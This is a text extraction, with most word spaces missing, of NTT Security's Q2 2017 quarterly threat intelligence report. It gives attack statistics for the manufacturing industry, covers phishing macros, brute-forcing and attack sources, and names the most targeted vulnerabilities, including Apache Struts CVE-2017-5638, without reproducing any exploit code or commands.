Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2Quarterly Highlights . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 Global Threat Visibility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 AttackProfileoftheManufacturingIndustry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 Apache“Struts”itsStuff . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3Global Threat Visibility / Observations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 TargetedIndustries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 ACloserLookatAttacksAgainstManufacturingIndustry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Attacks by Type . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 Web Application Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 AnalysisofMalwareDetections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 Attacks by Source . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 France . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 Netherlands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 TopTargetedVulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 AdobeFlashExploits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 ApacheStruts,ShellShockandWannaCry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Global Threat Visibility: Final Thoughts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14Attack Profile of the Manufacturing Industry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 WhatMakesManufacturinganAttractiveTarget? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 Trends–andAssociatedEmergingRisks–intheManufacturingIndustry . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 OperationalTechnologyand“SmartFactories” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 Industry4.0:Automation,ConnectivityandServitization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 NewTechnologiesandReuseofOldSoftware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 CyberEspionageandTheftofIP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 Recommendations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 ThreatstoManufacturing:FinalThoughts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19Apache CVE-2017-5638 Struts its Stuff: A Quick Look into Apache Struts . . . . . . . . . . . . . . . . . . . . . . . 20 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 WhatisaStrutsAttack? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 StrutsAttacksTimelines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 ObservedAttacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Struts Targets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 WhyTargetStruts? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 ApacheStrutsMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 StrutsSignaturesandRules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 ApacheStruts:Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25About GTIC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25About NTT-CERT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25About NTT Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Table of Contents
NTTSecurityanditsGlobalThreatIntelligenceCenter(GTIC)focus
onprovidingtimelyandactionableinformation,allowingour
clientstogainabetterunderstandingofthethreatsfacingtheir
organizationstoday.Thisisaccomplishedthroughresearchand
analysisofbothcurrentandemergingsecuritythreats.Collaboration
withtheSecurityOperationsCenters(SOCs),InformationSecurity
EngineeringTeam(ISET),ProfessionalSecurityServices(PSS)and
ManagedDeviceTeam(MDT)allowsNTTSecurityclientstobenefit
fromourproactiveapproachtosecurityresearchandthecontinuous
evolutionofdetectioncapabilities.
TheGTICQuarterlyThreatIntelligenceReportprovidesaglimpseinsidetheresearchconductedbyNTTSecurityresearchers,security
professionalsandanalysts,spanningthelastthreemonths.Inadditiontoawidevarietyofopen-sourceintelligencetoolsand
honeypots,GTIC–ThreatResearch(TR)alsoanalyzesdatafromglobalNTTSecuritymanagedsecurityservice(MSS)platforms.These
patented,cloud-basedNTTSecurityserviceplatformscollect,correlateandanalyzesecurityeventsacrosssystemsforourclientsaround
theworld,providingresearcherswithanevendeeperunderstandingoftheoverallthreatlandscape.
The quarterly report focuses on several different areas of research and analysis:
• Findingsfromouranalysisofactualeventsasobservedwithinclientenvironmentsandourhoneynetinfrastructure
• Findingsrelatedtoresearchfromspecificthreats
• Observationsfromrecentpublicly-disclosedbreachesandrecommendationsonhowtomitigateandpreventsimilarattacks
• AnalysisofmaliciousactorTactics,TechniquesandProcedures(TTPs)
InpreviouseditionsoftheGTICQuarterlyThreatReport,NTTSecurityanalystshavefocusedontheretail,financialandhealthcare
industries,providingaglimpseintocyberthreatsuniquetoeachindustry.Thisissuefocusesonseveralthreatsthemanufacturing
industryisfacing.And,althoughthemanufacturingindustrycoversanincrediblybroadlistofsegments,thisreportaddressesseveral
commondenominatorsacrosstheboard.
Whilenottypicallythoughtofashighly'attackable,'manufacturinghasbeenoneofthemostconsistentlyattackedindustriesoverthe
pastseveralyears.And,inadditiontopotentialthreatsuniquetomanufacturers,theindustryalsofacesavarietyofthreats,prevalent
acrossmanyindustries,includinginsiderandtechnicalthreats.Thisquarterlyreporttakesacloserlookatsomeoftheseproblems.
Introduction
Copyright 2017 NTT Security 3
• 86percentofmalwareinthemanufacturingindustrywere variantsofTrojansanddroppers.
• Reconnaissanceaccountedfor33percentofallactivityaimed atmanufacturingclientsinQ2‘17.
Apache “Struts” its Stuff• NTTSecuritydetectedattacksforApacheStruts,CVE-2017- 5638,lessthan48hoursaftertheinitialApacheadvisory, andlessthan24hoursafterthereleaseofproof-of-concept (PoC)code.
• ApacheStrutsbecamea“topfive”attacktypewithinabouta weekofbeinginitiallydetected,andattheendofJune,was stilla“topseven”attack.
• 76percentofallattackstargetingApacheStrutsoriginated fromIPaddressesinChina.
• 69percentofStrutsattacksfromChinaattemptedtodisable localfirewallsandinstallmalwarefromremoteservers, mostlylocatedintheUnitedStates,ChinaandSouthKorea.
• IntheU.S.,themosttargetedindustriesofattacksagainst ApacheStrutswereeducation(37percent)andhealthcare (28percent);inJapan,themosttargetedindustrywas government(46percent).
Duringthesecondquarterof2017(Q2‘17),NTTSecurityresearchersandanalystsuncoveredinformationthroughtheresearchofsignificantevents,identifiedviaglobalvisibilityoftheNTTSecurityclientbase.Someofthekeyfindingsbasedonthisresearchinclude:
Global Threat Visibility
• Overall,NTTSecurityobserveda24percentincrease inattacksagainstourclientsduringQ2’17overthe previousquarter.
• BasedonNTTSecurityclientdata,cybercriminalsappear tobeleveragingphishingemailswithmaliciousattachments containingPowerShellcommandsinVBAmacrosasaprimary attackvector.
• 67percentofallmalwaredistributioninQ2‘17was email-based.
• Public-facingMicrosoftSQL(MSSQL)serverswerepopular targetsforbrute-forcingbycybercriminalsduringQ2‘17.
• Webapplicationattacksaccountedfor21percentofall attacks.60percentofthosewereSQLandPHP injection-based.
• Vulnerabilitiesallowingcodeexecutionaccountedfor 73percentofattacks.
• ActivityagainstAdobeFlashPlayervulnerabilitiesaccounted for98percentofallactivitytargetingAdobeproducts.
• FiveoutoftheTop10mosthostilecountrieswerenewtothe Top10sincethefourthquarter2016(Q4’16).
Attack Profile of the Manufacturing Industry• Themanufacturingindustrywasthemostheavilytargeted industryacrossNTTSecurityclientsduringQ2’17,accounting for34percentofattackactivity.
• Themanufacturingindustrywasalsoheavilytargetedacross NTTSecurityclientnetworksthroughout2016,appearingin the“topthree”infiveofthesixgeographicregions.Noother industryappearedinthetopthreemorethantwice.
• 58percentofmalwaredistributioninmanufacturing environmentswasviaweb-baseddownloads.
QuarterlyHighlights
Copyright 2017 NTT Security 4
Top Targeted Industries
Manufacturing Finance Health Care Business Services Technology
Retail Other
0% 5% 10% 15% 20% 25% 30% 35%
25%
13%
10%6%
5%7%
40%
34%34%
GlobalThreatVisibility/Observations
IntroductionNTTSecurityanalystsobserveda24percentincreaseinthenumberofsecurityeventsduringQ2’17fromthepreviousquarter.AnalysisofMSSPdatasuggeststhisistheresultofanincreaseinreconnaissanceandphishingdistributionefforts,asthreatactorsheavilyfocusedonfindingvulnerablepublicfacingservers.Additionally,thetacticofembeddingmaliciousVBAmacrosintodocumentssentviaphishingemailsregainedpopularityduringQ2‘17,asevidencedbyanincreasein phishingcampaigns.
Targeted IndustriesAnalysisshowsthetopfiveindustriestargetedweremanufacturing,finance,healthcare,businessservicesandtechnology.Manufacturingwasthemostheavilytargetedindustry,with34percentofattacks. A Closer Look at Attacks Against Manufacturing IndustrySinceclientsinthemanufacturingindustryweretargetedin34percentofallmaliciouscyberactivity,NTTSecurityanalystsfocusedonthethreatsinthisindustry.
Manufacturing Attack Timeline
1,762K
1,868K490K
Manufacturing Attack Categories
Reconnaissance Brute Force Malware
0 500K 1,000K 1,500K 2,000K
Mar 26 Apr 2 Apr 9 Apr 16 Apr 23 Apr 30
Week of Date (2017)
May 7 May 14 May 21 May 28 Jun 4 Jun 11
Reconnaissance
Brute Forcing
Malware
Reconnaissance
Brute Forcing
Malware
Figure 2. Attack category timeline against manufacturing.
Figure 1. Q2 ’17 top targeted industries based on attack volume.
Copyright 2017 NTT Security 5
GlobalThreatVisibility/Observations
Thetopthreeattackcategoriesinthemanufacturingindustrywere:reconnaissance(33percent),brute-forceattacks(22percent)andmalware(ninepercent).Figure 2showsloweractivityagainstmanufacturingthroughoutApril,beforeseveralspikesoccurinMayandJune.Whiletherewasageneralincreaseinactivityagainstmanufacturingorganizationsthroughoutthequarter,themostsignificantincreaseinmaliciousactivitywasrelatedtothesethreecategories.
Reconnaissance Against ManufacturingReconnaissanceaccountedfor33percentofallactivityaimedatmanufacturingclientsinQ2‘17.AnalysissuggestscybercriminalsusedseveraldifferentpopularscanningtoolssuchasZmEu,MetasploitandMuieblackcattoscanpublic-facingsystems.Thesetoolscomeequippedwithseveralplugins,allowingforevenbeginnercybercriminalstoscanandfindvulnerabilitiesinsystemsandapplications.NTTSecurityidentifiedtheintendedpurposeofrecordedreconnaissancetrafficasshowninFigure 3.
Result ofExploitation
RemoteCode
Execution
RemoteCode
Execution
CVE
CVE-2012-1823
CVE-2012-2311
Product
sapi/cgi/cgi_main.cin PHP
sapi/cgi/cgi_main.c
Version(s)
< 5.4.2
< 5.4.3
RemoteCode
ExecutionCVE-2015-2208 phpMyAdmin 1.1.2
7.5
7.5
7.5
CVSS
Table 1. Top three targeted PHP vulnerabilities via reconnaissance and exploitation efforts against the manufacturing industry.
Asshown,PHP-basedapplicationsaccountedfor75percentofallreconnaissanceeffortsagainstthemanufacturingindustry.AmajorityofthistrafficwasviatheuseofZmEuandMuieblackcatscanningtools,whichscanforvulnerabilitiesincommonPHPfilesandpluginsbehindwebapplicationsandcontentmanagementsystems(CMS)likeWordPress.In2016WordFence1 conductedasurveywhichindicatedroughly56percentofallhackedWordPresssiteswerecompromisedviaexploitedplugins.ThephpMyAdminpluginwasdevelopedtosimplifydatabaseadministration,isthefront-endtoMySQLdatabases,andapopulartargettogainfullaccessoveradatabase.Althoughthesescansarecommon,theycanbeeffectiveifwebapplications,websites,etc.arenotconfiguredfollowingbestsecuritypractices.Thisbecomesalargerissueifthewebsiteorwebserverbeingusedinamanufacturingorganizationsetsupthewebserverina“securityunaware”manner,ordoesnotapplyautomaticupdatespotentiallyleavingthecompanyororganizationblindtoitsvulnerabilities.
ThefollowingvulnerabilitiesassociatedwithPHPapplicationsweretargetedinbothreconnaissanceandexploitationeffortsagainstthemanufacturingindustry.
75 .0% PHP Applications14 .0% DNS Servers7 .00% SNMP or ICMP Protocols2 .00% Web Servers1 .25% All Others0 .70% WordPress0 .05% NetBIOS Ports
Manufacturing Reconnaissance Targets
Figure 3. Targeted applications of reconnaissance traffic based on volume.
1 https://www.wordfence.com/blog/2016/03/attackers-gain-access-wordpress-sites/
Copyright 2017 NTT Security 6
MSSQL
FTP
HTTP
LDAP
SSH
Magento
MySQL
April 1 - April 8 April 9 - April 16 April 17 - April 24 April 25 - May 01 May 02 - May 09 May 10 - May 17 May 18 - May 25 May 26 - June 02 June 03 - June 11
Manufacturing Brute-Force Targets
Week of Date (2017)
GlobalThreatVisibility/Observations
Brute-forcing Manufacturing Systems and ApplicationsBrute-forcingtrafficaccountedfor22percentofallattacksagainstthemanufacturingindustry.NTTSecurityfocusedontheserver/applicationtargetsofthistraffic,discoveringFTPserverswereofhighestinterestat64percent,followedbyHTTP(18percent)andSSH(11percent).Figure4showsmanufacturingbrute-forcetargetvolumesforQ2‘17. Per Figure 4,althoughFTPandHTTPhadseverallargespikesforbrute-forceattempts,MSSQLwasconsistentlytargetedwithseveralthousandeventseachdayinApril,MayandJuneacrossmultipleclients.MSSQLisarelationaldatabasemanagementsystem(RDBMS)whichisapopulartargetinmanufacturingintermsofbrute-forcing.NTTSecuritydiscoveredthousandsofpublic-facingMSSQLserverswithdefaultport1433open. Figure 5showsasimpleShodanqueryforpublic-facingMSSQLservers.Thesequeriesrevealimportantdetailstoanattackersuchasservername,instancename,version,andportused.Combinethisreadilyavailableinformationwithagenericbrute-forcingtool,andthereturnoninvestmentforacybercriminalcouldbeexponential.InJanuary2017,thousandsofpublic-facingMongoDBdatabaseswerecompromised2andheldforransombycybercriminals.Notlongafter,CouchDBandHadoopServers
Figure 4. Manufacturing brute force target attack volume.
2 https://nakedsecurity.sophos.com/2017/01/11/thousands-of-mongodb-databases-compromised-and-held-to-ransom/3 https://www.bleepingcomputer.com/news/security/database-ransom-attacks-hit-couchdb-and-hadoop-servers/
werecompromised3usingthesameattackprocess.Forthisreason,itisnotonlybest-practice,butessentialthatdatabases/serversnotbepublic-facingandnothavedefaultcredentialsand/orportstodefendagainstbrute-forceattacks.
Figure 5. Simple query using Shodan’s API for public facing MSSQL servers.
Copyright 2017 NTT Security 7
Manufacturing Malware Distribution
0
500
1000
1500
2000
2500
3000
3500
April 7 April 17 April 27 May 7 May 17 May 27 June 6
Other Manual File TransferWeb
GlobalThreatVisibility/Observations
Malware in the Manufacturing EnvironmentNTTSecuritydiscovered86percentofmalwareinthemanufacturingindustrywereTrojan/droppervariants;inotherwords,softwareorapplicationswhichdropadditionalmaliciousbinarieswhethertheyappeartobelegitimateornot.NTTSecurityanalyzedthedistributioneffortsfordeliveringmalwaretosystemsinthemanufacturingindustry.Themostcommontechniqueusedtodistributemalwarewasdrivebydownloads.Figure 6showsmalwaredistributioneffortsthroughoutQ2’17inthemanufacturingindustry.Inadditiontothedatashowninthechart,NTTSecuritydetectedasmallvolumeofattemptedmalwaredistributionviaemailagainstthemanufacturingindustry.Sincethistypicallyamountedtolessthanafewattemptsperday,itdoesnotdisplaywellinFigure6.
Fifty-eightpercentofmalwaredistributioninmanufacturingenvironmentswasviaweb-baseddownloads.Web-baseddownloadsresultinginmalwareinstallationsviathewebcouldoccurwhenoneofthefollowingconditionsexist:
• Visitingacompromisedwebsitewhichdirectlyprovidesthe maliciouscontent,or
• Visitingacompromisedwebsitewhichhasmaliciouscontent providedtoit,forexample,viamalvertising.
NTTSecurityMSSPdataindicatesthatcybercriminalsoftenrelyonwebresourcestodelivermalwaretothemanufacturingindustry.
Figure 6. Malware distribution efforts in the manufacturing industry in Q2 ‘2017.
Copyright 2017 NTT Security 8
GlobalThreatVisibility/Observations
Attacks by TypeNTTSecurityanalysisindicates21percentofallattacksacrossallindustrieswerewebapplicationfocused,followedbyapplicationspecific(16percent)andmalware(12percent)basedattacks.Figure 7depictsasimplebargraphfortherepresentationofthesefindings.
Web Application AttacksAsstated,21percentofallattackswereagainstwebapplications.Sixtypercentoftheseattackswereinjection-based.Thisincludes,butisnotlimitedto,SQLandPHP-basedapplicationsaswellasincludingarbitrarycommandsinHTTPpacketstobeexecutedonthetargetserver.
A Closer Look at Web InjectionsWhileitiscommontoobserveanddetectSQLiagainstpublicfacingdevices,NTTSecurityidentifiedseveraltypesofwebinjectionsinQ2’17;thisincludes,butisnotlimitedto,PHP-basedapplications,LDAP,andHTTP.
PHP-based InjectionsWiththousandsoflibraries,PHPisoneofthemostcommonlyusedserver-sideprogramminglanguages.AccordingtoW3Techs4,PHPisdeployedonabout83percentofwebservers.Asdeveloperscontinuetointroducevulnerabilitiesintoapplications,threatactorswillcontinuetotargetPHP-basedapplications.BasedonNTTSecurityobservations,commandinjectionattemptsagainstPHP-basedapplicationsgainedpopularityasaspecifictypeofwebapplicationattackinQ2’17.
Figure 8. SQL-based injections versus PHP-based injections.
97 .0% SQL 3 .00% PHP <0 .01% Other
Web Application Injection Targets
Theprimarygoaloftheseattacksisarbitrarycodeexecution,theexecutionofmachinecodeonatargetmachineortargetprocesstypicallyleveragedafterexploitingavulnerability.Theexecutionofarbitrarycodeallowsthecybercriminaltotellthemachineorprocesswhattodo.Figure 8showswebapplicationinjectiontargetsaccordingtoMSSPdata.NTTSecuritydiscoveredamajorityoftheSQL-basedinjectionsweregenericandlikelybeinggeneratedviacommontoolssuchasHavijorsqlmap,whichtendtobenoisy.Meanwhile,PHP-basedinjectionsareusuallymorefocused,andbasedontheapplicationorvulnerabilitybeingtargeted.
21%16%
12%12%
10%7%
6%5%
4%4%
<3%
Attack Category Volume
Web Application AttackApplication Specific Attack
MalwareReconnaissance
DoS/DDoSSuspicious
Brute ForcingKnown Bad Source
Client Botnet ActivityService Specific Attack
Other
0 5 10 15 20 25
Figure 7. Attack category volume.
4 https://w3techs.com/technologies/details/pl-php/all/all
Copyright 2017 NTT Security 9
Figure 9. Attack volume differences in malware variants between Q4 ’16 and Q2 ’17.
0
20000
40000
60000
80000
100000
Q4’16 and Q2’17 Malware Variant Comparison
Q4’16 Q2’17 Q4’16 Q2’17 Q4’16 Q2’17Q4’16 Q2’17Q4’16 Q2’17Q4’16 Q2’17Q4’16 Q2’17
SpywareKey Logger
Root KitBotnetClient
RansomwareFakeware
Dialers
AdwareMalicious BHO
VirusWorm
TrojanDropper
Down48%
Down25%
Down98%
Down22%
Up1275%
Up234%
Up4354%
Q4’16 and Q2’17 Malware Variant Comparison
67%
Other
22%
Web
10%
ManualUpload
1%
Analysis of Malware DetectionsNTTSecurityanalystsanalyzedthedifferencesinmalwarevariantsbetweenQ4’16andQ2’17.
Overall,malwaredetectionsdropped41percentbetweenQ4’16andQ2’17.AsshowninFigure 9,Virus/Worms,Adware,andRansomwareallincreasedinQ2’17whilethevolumeofothermalwarevariantdetectionsfell.
NTTSecurityobservedthatmalwarecampaignscommonlycombinephishingemailswithamaliciousattachmentcontainingembeddedVBAmacros.ThesemacrosoftencontainobfuscatedPowerShellcommands,usedtodownloadthefinalmalwarepayload.WhileanalyzingMSSPdata,NTTSecurityobserved67percentofallattemptedmalwaredistributionwasthroughemail.Pleasenotethesestatisticsdonotincludesuccessfulversusunsuccessfulmalwareinstallations.Figure 10detailsthesefindings.
GlobalThreatVisibility/Observations
Figure 10. Malware distribution across all industries.
Copyright 2017 NTT Security 10
GlobalThreatVisibility/Observations
Forexample,whileanalyzingthemalwarecategory,MD5hashe5f6bf18b4b8024c0fd3e17595e8fb365wasdiscoveredinseverallogsforNTTSecurityclients.ThiswasthehashofamaliciousExcelfilesentinaphishingemailwiththefilename“FW20-05-17Dokument-VATI.xls.”Atinitialglance,thedocumentseemedharmless,however,asshowninFigure 11,analysisofoneofthetwoembeddedVBAmacrosdetailedobfuscatedcode. SeveralstringsineachvariablevaluewerebackwardsorrepresentedbyASCIInumbers.Variablesepitiimsorandmarvells werebothobfuscatedinthesamemanner,butoncedecoded
andcombined,theyrevealedaPowerShellcommandusedtodeliverWindowsmalware.
NTTSecurityexpectsthecontinueduseofphishingattackswithdocumentscontainingembeddedVBAmacroswilloccurwhereattackersuseamixofWindowstoolssuchasPowerShell,WindowsManagementInstrumentationCommand-Line(WMIC),orPsExectodownloadthemalwarepayload.Thistechniqueiseffectiveanddistributioncanbeautomatedtoincreasethelikelihoodofsuccessfullycompromisingvictims.
Figure 11. _VBA_PROJECT_CUR/VBA/ThisWorkbook Source Code.
Figure 12. Deobfuscated PowerShell command to retrieve mps.exe (365c4b6e651034daaebd4363efa4b0f)6.
5 https://www.virustotal.com/en/file/e3fff8975c852e6a7e4909033a2dec9c1c7ae794be2dd0e45398a6541293101b/analysis/6 https://www.virustotal.com/en/file/96c8aea7d0f65dfc41ccaf5384abfe19d5ea0f1f1e9c6359ae985932ac4db1e8/analysis/
Copyright 2017 NTT Security 11
GlobalThreatVisibility/Observations
93% Reconnaissance 3% Known Bad Source <1% Brute Forcing <1% DoS/DDoS <1% Web Application Attack <1% Application Specific Attack <1% Malware <1% Suspicious <1% Client Botnet Activity <1% Service Specific Attack
France Attack Categories
>20% 9 Puerto Rico 1%p
>20% 8 Chile 1%p
>20% 10 Hungary 1%p
>20% 7 Germany 3%p
Change
5p
p
t u
1 France 47%
8 2 Netherlands 8%
>20% 4 Brazil 4%
8 8 Canada 4%
3 3 China 6%
1 5 United Kingdom 4%
Rank Q2 2017 Attack Source % of AttackRank Q4 2016
p
q
t u
Figure 13. Top ten attacks originating from hosts in France.
Table 2. Top non-U.S. attack countries.
Attacks by SourceNTTSecurityanalystsreviewedthetopcountrieshostingsystemswhichgeneratedmalicioustrafficbetweenQ4‘16andQ2‘17.
DuringQ2’17,twocountriesstoodoutduetothepatternoruniquenessofactivity.Overthepastfewyears,theinfrastructureslocatedinFranceandtheNetherlandshaveimprovedsignificantly.Eachoffersawiderangeofservicestosupportindividualandspecificneeds,includingtelephony,hosting,cable,andinsomecases,alltheabove.Thehostingandvirtualprivateserver(VPS)markethascreatedasurgeinaffordableoffshorehosting.Threatactorsarestartingtomigrateandorexploitvulnerableserversinthesetwocountriesmoreandmore.Regardlessoftheactor’spurposeorreasoning,theywillcontinuetouseandexploitvulnerableservices.
FranceFranceaccountsfor47percentofhostileattacktraffic,mostofwhichappearstobeprobingorscanning-relatedactivities.However,monitoringdataincludesmultipleexamplesofexploitandunauthorizedaccessattempts.ThelargestclusterofexploiteventsisassociatedwithOnlineS.A.S.,amajortelecommunicationsentityprovidinginternetaccesstoFrance,NetherlandsandpossiblyotherEUcountries,asthisprovidercontinuestoexpanditsreach.SomeoftheserversappeartoberunningNginxandorotherproxyconfigurations.Becauseofthis,itislikelythetrueattackersareoperatingfromotherlocations.Thistypeofactivitywilllikelyincrease,asfewprovisionsarehistoricallytakenbytheusersandTier1providerstoremedythesituationbysecuringusersandenforcingpolicies.Overall,Figure 13displaysthetoptenattacksoriginatingfromFrance.Reconnaissanceactivityisthemostcommon,at93percentofalldetectedactivity.
Copyright 2017 NTT Security 12
70%22%
6%<1%<1%<1%<1%<1%<1%<1%<1%
Attack Categories from Hosts in Netherlands
ReconnaissanceWeb Application Attack
Application Specific AttackMalware
Known Bad SourceBrute Forcing
Brute ForceDoS / DDoSSuspicious
Service Specific AttackClient Botnet Activity
0 40302010 50 60 70 80
GlobalThreatVisibility/Observations
NetherlandsTheNetherlandscameinadistantsecond.UnlikeFrance,whosetrafficoriginatedfrommultipleISP/providers,sourcesinTheNetherlandsoriginatedfromonlythreeIPaddressesallocatedtoKPNB.V.,aDutch-basedtelecommunicationscompanyprovidinginternetandmobilephoneaccess.Basedontheeventdata,athree-dayinitiativefromtwooftheseIPaddressestargetedasinglevictiminthemanufacturingindustry.Activityfrom145.129.22[.]220accountedfor75percentoftheactivity;25percentwasfrom145.129.21[.]42.ActivityfromthethirdIPaddresswasultimatelyinsignificant.TheirprimarygoalwashostandnetworkdiscoveryviaDNSzonetransfers.Zonetransferscandisclosealargeamountofinformationaboutanetworkandorganization,dependingontheresourcerecords(RR)beingusedandhostnomenclature.
Overall,Figure 14 displaysthetoptenattacksoriginating fromNetherlands,showingthatreconnaissancewasthe mostcommonlydetectedattacktypewith70percentofallhostileactivity.
Top Targeted VulnerabilitiesDuringQ2‘17,codeexecution-basedvulnerabilitiesaccountedfor73percentofthetopattacks.ThetopthreeCVEslistedinTable 3weremostpopular.
Thesevulnerabilitieswereobservedbeingexploitedfromsourcesin68countries.ThemostprolificattemptsoriginatedfromChina,PolandandFrance.Thistrendspannedacross15industrieswithmanufacturingandfinanceasthetoptwoaffected,andtechnologyasadistantthirdplace.Inachange
Figure 14. Top Ten Attacks Originating from Hosts in Netherlands.
CVE
CVE-2016-4116
CVE-2017-5638
CVE-2014-6271
EventPercentage
57%
24%
10%
Target/Campaign
Adobe Flash
Apache Struts
CVE-2017-0147 3% WannaCry(EternalBlue)
CVE-2011-3230 3% Safari Exploit
ShellShock
CVE-2009-0183 3%Free
Download Manager
Table 3. Code execution target-campaign event percentage.
frompreviousanalysis,thetelecommunicationindustrywastargetedrelativelylightlyduringQ2’17.Theexceptiontothiswasasmallsubsetwithintelecommunications,specificallybusinessesthatprovidehostingorotherconnectivityservices,whichwerehighlytargetedbyattemptstoexploitvulnerabilitiesinApacheStrutsandBash(Shellshock).
Copyright 2017 NTT Security 13
29% Manufacturing26% Finance8% Technology8% Health Care7% Non-Profit7% Construction/Real Estate6% Retail9% Other
Industries Targeted with Top 10 CVEs
GlobalThreatVisibility/Observations
Figure 15. Attack method visualization according to CVE.
Table 4. Top five Adobe Flash Player vulnerabilities being targeted.
DataTheft
CodeExecution
73% 20% 7%
Denialof Service
(DoS)
TheidentifiedCVEsinthetop-tencanbecategorizedintothreeattackmethodologies:
• codeexecution
• datatheft
• denialofservice(DoS)
Adobe Flash ExploitsSignaturesforCVE-2016-4116triggeredonspecificporttrafficusedtolaterallymovefiles.Flashhasbeen,andwillfortheforeseeablefuture,continuetobeahighly-targetedproductduetoitswidespreaduseacrossmultipleoperatingsystems,anditshistoryofvulnerabilities.IncomparisontootherAdobeproducts,Flashaccountedforastaggering98percentofallAdobe-basedvulnerabilityevents.Ofthattotal,themosttargetedvulnerabilitywasCVE-2016-4116.
